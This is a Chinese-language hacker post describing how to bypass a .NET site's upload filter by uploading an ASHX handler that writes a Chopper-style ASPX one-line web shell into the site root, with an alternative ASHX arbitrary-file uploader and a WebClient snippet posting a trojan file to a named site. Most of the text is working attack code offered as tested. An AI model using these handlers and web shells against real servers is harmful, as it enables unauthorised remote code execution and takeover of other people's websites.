某站,.Net环境,上传处未限制Ashx和Asmx,后者上传无法运行,提示Asmx脚本只能在本地运行,于是打算先传个Ashx脚本然后在当前目录下生成Aspx文件(目标不能执行Asp文件),
网上找到如下Ashx代码:
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root. asp x"));
file1.Write("<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"pass\"],\"unsafe\");%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
我将脚本中的Asp一句话改成菜刀的Aspx一句话~不过执行的时候爆错,说未知指令@Page。遂采用一下2种方式解决:
1,用String连接字符串
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
string show="<% @Page Language=\"Jscript\"%"+"><%eval(Request.Item"+"[\"chopper\"]"+",\"unsafe\");%>";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.aspx"));
file1.Write(show);
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
2.比较笨的方法,看代码吧
<%@ WebHandler Language="C#" Class="Uploader" %>
using System;
using System.IO;
using System.Web;
public class Uploader : IHttpHandler
{
public void ProcessRequest(HttpContext hc)
{
foreach (string fileKey in hc.Request.Files)
{
HttpPostedFile file = hc.Request.Files[fileKey];
file.SaveAs(Path.Combine(hc.Server.MapPath("."), file.FileName));
}
}
public bool IsReusable
{
get { return true; }
}
}
然后用VS建立WinForm程序~主函数里写:
System.Net.WebClient myWebClient = new System.Net.WebClient();
myWebClient.UploadFile("http://www.xcnzz.com/Uploader.ashx", "POST", "C:\\ma.aspx");
执行就可以了~以上方法均测试成功~
P.S:Thx from T00ls.
查看更多关于揭穿黑客关于Ashx脚本写aspx木马的方法汇总 - 网站的详细内容...